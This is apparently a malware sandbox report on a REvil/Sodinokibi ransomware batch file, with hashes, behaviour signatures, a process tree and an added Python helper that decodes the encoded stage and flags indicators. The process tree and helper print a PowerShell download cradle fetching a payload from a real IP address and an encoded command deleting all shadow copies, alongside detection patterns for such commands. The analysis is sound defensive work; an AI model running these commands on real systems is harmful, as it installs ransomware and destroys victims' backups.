Analysis

  • max time kernel
    111s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7v191014
  • submitted
    10-02-2020 20:10

General

  • Target

    hvQ21ebW.bat

  • Size

    191B

  • MD5

    7eb2eb2bf474386d8d7eef5ee2aaf3ef

  • SHA1

    c9789a38150044b9ca8a4b9d350df691611f1861

  • SHA256

    29b2a12ef2c75d6bb1bdbb4536e478a386dc4082a0756adc219bbd25c724bd1c

  • SHA512

    827139be92e830cc7e7d6ac935327fe8960508ecb5e59cf338fb3cd2cc7cda12ae5686f15709bf5fec2cfb399912a9803f7b372601802bcd27e928072638b512

Malware Config

Extracted

Language
ps1
Source
URLs
ps1.dropper

http://185.103.242.78/pastes/hvQ21ebW

Extracted

Language
ps1
Source

Signatures

  • Suspicious use of WriteProcessMemory 5 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality

  • Discovering connected drives 3 TTPs 7 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Modifies service 2 TTPs 4 IoCs
  • Drops file in Program Files directory 33 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\hvQ21ebW.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Discovering connected drives
    PID:1184
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/hvQ21ebW');Invoke-PBEESOQZ;Start-Sleep -s 10000"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Blacklisted process makes network request
      • Discovering connected drives
      • Sets desktop wallpaper using registry
      • Suspicious behavior: CmdExeWriteProcessMemorySpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      • Drops file in Program Files directory
      PID:1456
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
        3⤵
        • Discovering connected drives
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious behavior: EnumeratesProcesses
        PID:2020
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Modifies service
    PID:1568
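
A small triage helper, added here as an example and not part of the sandbox report, that takes the three command lines recorded in the process tree above, decodes the `-e` (EncodedCommand) payload the way PowerShell does (base64 of UTF-16LE text), and flags the two behaviours the report's signatures describe: the IEX/DownloadString cradle that pulls the paste from 185.103.242.78, and the shadow-copy deletion hidden in the encoded stage. The command lines are copied from the report; the indicator names, regular expressions and the list of recognised `-EncodedCommand` abbreviations are this example's own choices, not anything the sandbox or the malware defines.

```python
"""Triage helper for the process tree in this report.

Decodes PowerShell -EncodedCommand payloads and flags the download cradle
and shadow-copy deletion seen in the recorded command lines. Added example;
the command lines are copied from the report, everything else is the
example's own (indicator names, patterns, ATT&CK mapping in comments).
"""
import base64
import re
from typing import Dict, List, Optional

# Command lines copied verbatim from the report's process tree
# (PIDs 1184, 1456 and 2020, in that order).
SAMPLE_COMMANDLINES: List[str] = [
    'cmd /c "C:\\Users\\Admin\\AppData\\Local\\Temp\\hvQ21ebW.bat"',
    'C:\\Windows\\SysWOW64\\WindowsPowerShell\\v1.0\\powershell.exe '
    '"IEX (New-Object System.Net.WebClient).DownloadString('
    "'http://185.103.242.78/pastes/hvQ21ebW');Invoke-PBEESOQZ;Start-Sleep -s 10000\"",
    "powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3"
    "AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABl"
    "AHQAZQAoACkAOwB9AA==",
]

# -EncodedCommand plus the abbreviations most often seen in the wild
# (-e, -ec, -enc). PowerShell accepts other unambiguous prefixes too;
# extend the alternation if your telemetry shows them. (example's choice)
ENCODED_ARG = re.compile(r"(?i)(?:^|\s)-(?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)")
# A cradle needs both a fetch and an execute primitive on the same command line.
CRADLE_EXEC = re.compile(r"(?i)\b(?:iex|invoke-expression)\b")
CRADLE_FETCH = re.compile(
    r"(?i)\b(?:downloadstring|downloadfile|downloaddata|invoke-webrequest|iwr|invoke-restmethod|irm)\b"
)
URL = re.compile(r"""(?i)https?://[^\s'")]+""")
# The WMI/vssadmin/wmic forms of shadow-copy removal (ATT&CK T1490).
SHADOW_COPY_DELETE = re.compile(
    r"(?i)(?:win32_shadowcopy.*\.delete\(|vssadmin(?:\.exe)?\s+delete\s+shadows"
    r"|wmic(?:\.exe)?\s+shadowcopy\s+delete)"
)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand text, or None if the flag is absent
    or the value is not valid base64 / UTF-16LE."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(cmdline: str) -> Dict[str, object]:
    """Classify one command line, checking both the raw text and, when
    present, the decoded -EncodedCommand payload."""
    decoded = decode_encoded_command(cmdline)
    views = [cmdline] + ([decoded] if decoded else [])
    indicators: List[str] = []
    if any(CRADLE_EXEC.search(v) and CRADLE_FETCH.search(v) for v in views):
        indicators.append("download_cradle")       # ATT&CK T1059.001 + T1105
    if any(SHADOW_COPY_DELETE.search(v) for v in views):
        indicators.append("shadow_copy_deletion")  # ATT&CK T1490
    if decoded is not None:
        indicators.append("encoded_command")       # ATT&CK T1027
    urls = sorted({u for v in views for u in URL.findall(v)})
    return {"decoded": decoded, "indicators": indicators, "urls": urls}


if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDLINES:
        result = triage(cmd)
        print(cmd[:70] + ("..." if len(cmd) > 70 else ""))
        print("  decoded   :", result["decoded"])
        print("  indicators:", result["indicators"])
        print("  urls      :", result["urls"])
```

Run against the tree above, the cmd.exe launcher (PID 1184) yields no indicators on its own, the first powershell.exe (PID 1456) is flagged as a download cradle with the paste URL extracted, and the child powershell.exe (PID 2020) decodes to `Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();}`, which is the shadow-copy deletion that explains the vssvc.exe activity and "Modifies service" entry in the same tree. Note that the decoder only looks at the command line; a payload passed through `-Command` with `[Convert]::FromBase64String` or read from a file would need the script body, not the process arguments.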

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4628e689-d195-4873-bc54-2194d7d68777

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_512b5fbe-a222-4c41-85f8-7f61ee5ca5bd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c6be20a0-2b44-41e6-b03e-788e1380648b

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_c85534f7-abc2-478b-a265-18e03f17967d

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_eb154db7-5347-459d-a5ae-f27e0827e401

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_ef13c2a6-fcdf-474f-b686-be9a419bd5e9

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms